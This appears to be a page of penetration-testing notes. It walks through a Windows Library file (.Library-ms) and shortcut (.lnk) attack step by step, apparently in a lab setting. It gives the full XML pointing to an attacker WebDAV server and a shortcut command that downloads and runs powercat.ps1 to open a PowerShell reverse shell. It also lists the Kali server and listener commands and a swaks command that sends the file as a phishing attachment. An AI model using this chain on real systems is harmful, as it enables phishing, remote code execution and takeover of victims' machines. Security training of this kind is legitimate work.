Windows Library File Attack

This attack abuses Windows Library Files (.Library-ms) and shortcut files (.lnk) to trick a victim into connecting back to our Kali machine, ultimately delivering a PowerShell reverse shell via PowerCat.

Step 1 : Create the Windows Library File (on Windows)

Open VS Code and create the file:

type nul > config.Library-ms

Paste the following XML into config.Library-ms, ensuring the IP points to your Kali machine:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-345826</name>
  <ownerSID>S-1-5-21</ownerSID>
  <version>1</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.45.218</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

⚠️ Confirm http://192.168.45.218 matches your Kali machine IP.

Save the file, then transfer config.Library-ms to Kali.

Step 2 : Create the Shortcut File (on Windows)

Right-click the Desktop → New → Shortcut
Set the target to the following command:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.218:8000/powercat.ps1'); powercat -c 192.168.45.218 -p 443 -e powershell"

When a victim double-clicks this shortcut, it downloads PowerCat from our server and opens a reverse shell.

Name the shortcut something convincing, then transfer the .lnk file to Kali.

Step 3 : Set Up Kali (Attack Machine)

• Copy PowerCat to working directory

cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

• Start WebDAV server (serves the Library file via HTTP/WebDAV)

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .

• Start HTTP server (serves PowerCat)

python3 -m http.server 8000

• Start the reverse shell listener

Alternatively use nc -lvnp 443 if Penelope is unavailable.

penelope -p 443

Step 4 : Deliver the Payload via Email

Send a phishing email attaching config.Library-ms with a convincing subject and body.

sudo swaks \
  -t [email protected] \
  -t [email protected] \
  --from [email protected] \
  --attach @config.Library-ms \
  --server 192.168.221.242 \
  --body @body.txt \
  --header "Subject: Staging Script" \
  --suppress-data \
  -ap

Provde The SMTP Credentials When Prompted:

body.txt should contain a simple message, e.g., Hello World.

Attack Flow Summary

Victim opens email
  └─> Double-clicks config.Library-ms
        └─> Windows contacts WebDAV server (port 80) on Kali
              └─> Victim sees shortcut → double-clicks it
                    └─> PowerShell downloads powercat.ps1 (port 8000)
                          └─> PowerCat connects back to Kali (port 443)
                                └─> Reverse shell established ✅

Port

Service

Purpose

WebDAV (wsgidav)

Serve Library file

8000

Python HTTP

Serve powercat.ps1

443

Penelope / nc

Catch reverse shell

MORE REF : http://michalszalkowski.com/security/client-side-attacks/abusing-windows-library-files/

PreviousCredential Harvesting {} Post Exploitation NextLigolo-ng OG

Good morning

hashtagStep 1 : Create the Windows Library File (on Windows)

hashtagStep 2 : Create the Shortcut File (on Windows)

hashtagStep 3 : Set Up Kali (Attack Machine)

hashtagStep 4 : Deliver the Payload via Email

hashtagAttack Flow Summary

Step 1 : Create the Windows Library File (on Windows)

Step 2 : Create the Shortcut File (on Windows)

Step 3 : Set Up Kali (Attack Machine)

Step 4 : Deliver the Payload via Email

Attack Flow Summary